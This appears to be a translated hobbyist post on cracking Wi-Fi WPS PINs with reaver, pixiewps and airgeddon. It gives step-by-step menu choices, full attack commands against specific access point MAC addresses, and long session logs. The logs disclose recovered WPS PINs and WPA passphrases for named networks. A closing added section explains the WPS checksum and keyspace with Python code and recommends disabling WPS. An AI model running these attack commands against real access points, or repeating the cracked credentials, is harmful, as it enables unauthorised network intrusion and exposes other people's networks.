It seems most people use the AR9271 to crack WPS with Pixie Dust.
It seems to depend on the wireless card: https://www.youtube.com/watch?v=lGm1dXTjcJA uses an RTL8187 (the former "king of cards") and the instant WPS crack fails!!!
It has nothing to do with the version number... it also fails with the new Pixiewps 1.2.
There are successes~
A Russian newbie used airgeddon (v5.14) and the new Pixiewps (1.2) to crack WPS in seconds
(https://www.youtube.com/watch?v=fFCo8d7S-d0)
Steps:
After starting, press Enter through the prompts, then select the wireless card: 2 (AR9271)
Then another pile of Russian text (11 options): 2
After the yellow-text prompt, Enter again
Then a flash, and he pressed 8 (still the same 11 options as above)
This time 13 options appear; he chose 4
This automatically calls wash, which scans for APs; it seems to end on its own (I couldn't tell whether he pressed Alt+F4 or Ctrl+C)
Done, an AP list appears; he chose one of them (the tenth) and entered 10
A 13-option menu pops up; he chose 8
Yellow text, Enter
Enter again
This time it calls reaver's Pixie Dust attack
It tried PIN 12345670, cracked it, and printed the result, showing the Pixiewps 1.2 password.
Finally the window says close window
Third video: another RTL8187 here, with Pixiewps 1.1, still no success!!!
Fourth video: this one uses an AR9271 and the new Pixiewps (1.2); the default attack failed, but after repeated attempts, success!!!
wash -i wlan0mon
reaver -e TP_LINK_XXX -b xx:xx:xx:xx:xx:xx -c 11 -K 1 -i wlan0mon
Target AP WPS Model Name: RTL8xxx
At the end pixiewps reports that the AP might be vulnerable and suggests trying again with --force or with a newer set of data...
It seems the WPS chipset vendors affected should be Realtek, Ralink and Broadcom... (to be investigated)
Finally succeeded!!! No need to use pixiewps
AP SSID: 100-301
WPS PIN: 47829657
WPA PSK:13704380818
FAST300R WPS number:7
grep is a handy tool; combine it with wash:
wash -i wlan0mon |grep ""
=====
Reaver Dust Pin Cracked!!!
root@kali:~# reaver -i wlan0mon -vv -K 1 -c 4 -b B0:C5:54:DA:A9:5A
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
[+] Switching wlan0mon to channel 4
[+] Waiting for beacon from B0:C5:54:DA:A9:5A
[+] Associated with B0:C5:54:DA:A9:5A (ESSID: walawala)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 4b:86:6f:2e:76:49:21:ce:56:c2:93:63:3c:b5:a0:b5
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: D-Link Systems
[P] WPS Model Name: DIR-619L
[P] WPS Model Number: DIR-619L
[P] Access Point Serial Number: 20070413-0001
[+] Received M1 message
[P] R-Nonce: 05:84:45:bc:61:91:44:0d:50:ab:73:30:58:c2:d5:d0
[P] PKR: 89:90:3d:aa:c7:52:5a:3e:33:c5:b8:33:a3:1d:bf:a5:3c:95:d4:d4:6f:4c:1b:f5:3f:9b:e8:77:47:d8:72:7b:a9:46:85:f6:83:4b:6a:11:d0:6d:1d:5b:5f:af:70:32:02:4e:f9:d7:5c:bb:45:d8:03:eb:b2:ea:5d:c7:b2:a8:05:9d:f3:7e:93:be:97:c4:d6:60:11:cc:fc:9a:d3:21:f3:b9:4b:5b:79:ae:5d:31:66:3d:7c:41:42:31:df:5a:62:64:70:97:ae:7a:7a:57:43:13:71:01:cc:80:df:c0:7d:45:2e:e6:5d:92:8f:22:28:6c:53:f6:4f:5e:f8:aa:bf:21:4b:c6:9e:37:74:86:37:f2:07:6b:26:b9:7a:6f:50:86:6e:2a:80:3a:5a:e4:0f:d3:9e:50:12:4e:86:38:05:38:c6:34:1a:b7:8a:8a:13:f9:19:f9:61:c0:75:b7:2c:9a:1d:21:d5:5c:14:e7:50:94:c8:53:a8:4d:0f:06
[P] AuthKey: 77:e6:24:e3:4f:d1:8e:57:48:a2:88:de:ee:88:0e:14:bc:8e:9e:c8:4b:eb:14:ec:9e:8b:cb:d5:d6:6d:79:97
[+] Sending M2 message
[P] E-Hash1: d1:61:6f:47:df:93:d1:94:80:ec:a1:23:3c:7b:0b:1e:7a:b7:c4:09:a8:b8:20:87:cb:26:89:d4:d5:34:e3:21
[P] E-Hash2: 11:58:69:bd:7c:9d:3a:8c:18:e9:b1:04:bc:2e:85:a2:39:fb:12:cd:b3:a0:a5:c5:95:88:08:1d:fb:d7:92:a7
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.2
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s 468 ms
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[Pixie-Dust]
root@kali:~# pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 89:90:3d:aa:c7:52:5a:3e:33:c5:b8:33:a3:1d:bf:a5:3c:95:d4:d4:6f:4c:1b:f5:3f:9b:e8:77:47:d8:72:7b:a9:46:85:f6:83:4b:6a:11:d0:6d:1d:5b:5f:af:70:32:02:4e:f9:d7:5c:bb:45:d8:03:eb:b2:ea:5d:c7:b2:a8:05:9d:f3:7e:93:be:97:c4:d6:60:11:cc:fc:9a:d3:21:f3:b9:4b:5b:79:ae:5d:31:66:3d:7c:41:42:31:df:5a:62:64:70:97:ae:7a:7a:57:43:13:71:01:cc:80:df:c0:7d:45:2e:e6:5d:92:8f:22:28:6c:53:f6:4f:5e:f8:aa:bf:21:4b:c6:9e:37:74:86:37:f2:07:6b:26:b9:7a:6f:50:86:6e:2a:80:3a:5a:e4:0f:d3:9e:50:12:4e:86:38:05:38:c6:34:1a:b7:8a:8a:13:f9:19:f9:61:c0:75:b7:2c:9a:1d:21:d5:5c:14:e7:50:94:c8:53:a8:4d:0f:06 -s d1:61:6f:47:df:93:d1:94:80:ec:a1:23:3c:7b:0b:1e:7a:b7:c4:09:a8:b8:20:87:cb:26:89:d4:d5:34:e3:21 -z 11:58:69:bd:7c:9d:3a:8c:18:e9:b1:04:bc:2e:85:a2:39:fb:12:cd:b3:a0:a5:c5:95:88:08:1d:fb:d7:92:a7 -a 77:e6:24:e3:4f:d1:8e:57:48:a2:88:de:ee:88:0e:14:bc:8e:9e:c8:4b:eb:14:ec:9e:8b:cb:d5:d6:6d:79:97 -n 4b:86:6f:2e:76:49:21:ce:56:c2:93:63:3c:b5:a0:b5 --force
Pixiewps 1.2
[*] PRNG Seed: 1358756030 (Mon Jan 21 08:13:50 2013 UTC)
[*] Mode: 3 (RTL819x)
[*] PSK1: 5f:3f:e9:93:76:7c:9b:4d:f9:28:46:dd:3d:75:80:ce
[*] PSK2: 57:6d:5b:70:27:4a:74:e5:d4:1f:2b:ae:a2:91:2c:90
[*] E-S1: 79:b4:f4:5f:6b:56:96:a0:3d:b8:af:ac:26:0d:8f:53
[*] E-S2: 79:b4:f4:5f:6b:56:96:a0:3d:b8:af:ac:26:0d:8f:53
[+] WPS pin: 50621101
[*] Time taken: 209 s 164 ms
root@kali:~# reaver -i wlan0mon -vv -c 4 -b B0:C5:54:DA:A9:5A -p 50621101
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
[+] Switching wlan0mon to channel 4
[+] Waiting for beacon from B0:C5:54:DA:A9:5A
[+] Associated with B0:C5:54:DA:A9:5A (ESSID: walawala)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 50621101.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 0d:74:3b:bf:03:5a:cd:6d:16:8c:3d:31:57:95:62:82
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: D-Link Systems
[P] WPS Model Name: DIR-619L
[P] WPS Model Number: DIR-619L
[P] Access Point Serial Number: 20070413-0001
[+] Received M1 message
[P] R-Nonce: a5:e3:cc:b7:8b:76:10:e5:a8:e9:e0:17:b2:05:92:b2
[P] PKR: c1:89:3b:04:b6:a0:04:59:db:6e:22:3c:8f:11:ac:00:bd:72:22:1d:09:2a:7b:9f:ee:17:6f:64:89:05:c3:82:30:a0:ba:08:02:81:36:a4:cb:0e:a8:20:68:18:8d:3f:19:30:e8:80:8c:47:47:a8:86:49:6b:61:a2:4c:48:b9:5f:01:75:fe:10:bc:d3:79:ef:71:fd:7d:bd:6a:8e:83:79:b8:8e:3c:4a:01:43:c6:5b:17:34:d5:3a:fc:16:b8:00:97:ad:cf:20:2b:c4:a5:a1:25:5c:0b:f4:d6:74:89:5d:da:16:5a:8a:bc:bf:36:65:d8:01:e5:bb:37:b2:39:1b:ff:43:57:37:59:9b:ac:18:d3:b1:73:fe:90:e9:96:ca:ad:a5:03:50:d7:fd:79:4d:01:7f:0d:ef:e9:fe:41:61:50:0d:4c:18:cd:ea:ad:a8:39:f3:0d:6f:0c:3b:7f:ed:54:81:a2:22:3c:7e:9d:c7:de:08:70:be:41:dd:07
[P] AuthKey: ca:12:b2:8e:1e:38:7b:69:74:8f:f5:f2:e3:eb:28:f4:44:4a:2b:be:d4:29:14:4a:91:12:14:85:12:60:3e:7e
[+] Sending M2 message
[P] E-Hash1: b5:cf:c6:89:16:d7:4a:7d:c5:fa:e0:27:38:c3:32:e3:12:f4:f4:66:8c:51:f7:91:52:bf:0f:75:4d:c8:c9:d7
[P] E-Hash2: a2:41:e8:18:fb:15:77:3b:cb:cf:54:db:cb:16:ca:31:74:4b:b1:ac:43:51:7b:33:26:60:6e:2b:c3:49:62:a8
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] p2_index set to 1
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 50621101.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 57:9e:98:59:62:e2:e2:9f:0b:7c:e3:18:13:23:f3:0b
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: D-Link Systems
[P] WPS Model Name: DIR-619L
[P] WPS Model Number: DIR-619L
[P] Access Point Serial Number: 20070413-0001
[+] Received M1 message
[P] R-Nonce: 03:45:7b:a0:d0:3e:fd:fe:1f:af:eb:a7:34:4d:b0:39
[P] PKR: cd:3e:24:9f:f5:db:6c:a9:3b:01:4d:e1:a0:10:b6:52:63:87:f0:df:e9:32:4d:d1:47:69:e9:aa:c7:72:9b:1d:a5:a0:7d:7a:1e:de:49:2c:48:0a:af:c0:28:76:bd:b7:0d:06:9c:be:41:95:e7:29:86:e8:09:01:bb:92:61:a8:6f:bf:52:53:25:63:2b:d6:58:de:2c:51:27:21:0d:b6:5f:f3:3c:59:86:22:ee:15:f8:c6:cf:80:ea:06:bc:57:be:a7:1a:ca:ef:76:f0:46:93:e4:0e:be:ef:af:6d:40:82:72:a1:ed:0c:fa:7d:ea:37:35:e9:e2:da:05:65:08:bf:7c:d8:61:f4:cf:46:50:4c:28:49:ab:c2:b7:6f:be:fa:24:a8:bf:42:c9:3a:9c:e7:6f:0c:30:e4:fb:67:f8:1f:35:55:0a:62:3f:ed:2e:3e:73:85:26:42:6e:ee:2a:fa:08:3d:0d:da:0d:3e:5f:2b:15:4f:fb:0b:86:b4:9c
[P] AuthKey: 50:2a:33:65:ee:dc:86:07:9b:e0:cb:4a:03:bb:52:e6:79:56:fa:03:e8:a1:b7:78:d6:78:e4:4b:77:c7:d8:ba
[+] Sending M2 message
[P] E-Hash1: 5d:7b:5c:55:78:ff:81:88:9f:e3:0c:ef:b9:e4:e9:1e:fc:61:be:a3:44:1d:d4:34:0e:f1:f7:00:ae:93:38:5b
[P] E-Hash2: 3d:ca:3f:58:bb:14:8d:c2:42:7c:e6:d0:90:16:33:e8:ca:dc:2a:03:f2:a9:74:e3:a4:4e:c4:c1:82:f4:39:1e
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 7 seconds
[+] WPS PIN: '50621101'
[+] WPA PSK: '04332226868'
[+] AP SSID: 'walawala'
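Two details in the log above are worth understanding from the defender's side: reaver's first candidate is 12345670 rather than 12345678, and "Max pin attempts" is 11000 rather than 10^8. Both follow from the WPS PIN format, where the 8th digit is a checksum over the first 7, and from the protocol acknowledging each half of the PIN separately. The following is an added example (not code from the page, reaver or pixiewps) that implements the WPS checksum from the Wi-Fi Simple Configuration specification, validates the PINs that appear in this post, and scans reaver-style log lines for the PINs it reports trying. The sample log is constructed from the lines above; the function names are my own.

```python
"""WPS PIN checksum arithmetic and a small reaver-log scanner (added example).

The 8th digit of a WPS PIN is a checksum of the first 7, so only 10^7 PINs
are well-formed, and the registrar confirms the two halves of the PIN in
separate messages (M4 for the first half, M6 for the second), which is the
design flaw that reduces the worst case to 10^4 + 10^3 = 11000 attempts.
"""
import re


def wps_checksum(first7: str) -> int:
    """Return the checksum digit for the first 7 digits of a WPS PIN.

    Digits in odd positions (1st, 3rd, 5th, 7th) are weighted 3, digits in
    even positions are weighted 1; the checksum makes the total a multiple of 10.
    """
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("expected exactly 7 decimal digits")
    accum = 0
    for i, ch in enumerate(first7):
        accum += 3 * int(ch) if i % 2 == 0 else int(ch)
    return (10 - accum % 10) % 10


def complete_pin(first7: str) -> str:
    """Append the checksum digit to a 7-digit prefix to form a full PIN."""
    return first7 + str(wps_checksum(first7))


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is 8 decimal digits whose last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_checksum(pin[:7])


def reaver_keyspace() -> int:
    """Worst-case number of online PIN attempts against a WPS registrar.

    First half: 4 free digits -> 10^4 candidates (confirmed by M4).
    Second half: 3 free digits plus the checksum -> 10^3 candidates (M6).
    This is the 11000 shown as "Max pin attempts" in the reaver log.
    """
    return 10 ** 4 + 10 ** 3


# Matches reaver's "[+] Trying pin NNNNNNNN." progress lines.
TRYING_RE = re.compile(r"Trying pin (\d{8})")


def pins_in_log(log_text: str) -> list:
    """Return [(pin, checksum_ok), ...] for each distinct PIN reaver tried.

    A PIN with a bad checksum in a log would indicate a tool or transcription
    error rather than a real attempt, since a compliant registrar rejects it.
    """
    seen = []
    result = []
    for m in TRYING_RE.finditer(log_text):
        pin = m.group(1)
        if pin not in seen:
            seen.append(pin)
            result.append((pin, is_valid_wps_pin(pin)))
    return result


# Constructed sample: two progress lines lifted from the reaver session above.
SAMPLE_LOG = """[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 50621101.
[+] Trying pin 50621101.
"""

if __name__ == "__main__":
    for pin in ("12345670", "50621101", "47829657", "12345678"):
        print(pin, "checksum ok" if is_valid_wps_pin(pin) else "BAD checksum")
    print("worst-case online attempts:", reaver_keyspace())
    print(pins_in_log(SAMPLE_LOG))
```

The checksum explains the "Pin count: 10000" in the second run: with -p 50621101 reaver starts at the first entry of the second-half phase (index 10000), because the first half is already known. For an administrator, the practical conclusion from the arithmetic is that an 8-digit PIN with an online registrar gives at most 11000 guesses of protection, which is why disabling WPS PIN mode (or at least confirming the AP locks after a handful of failures) matters more than the PIN value itself.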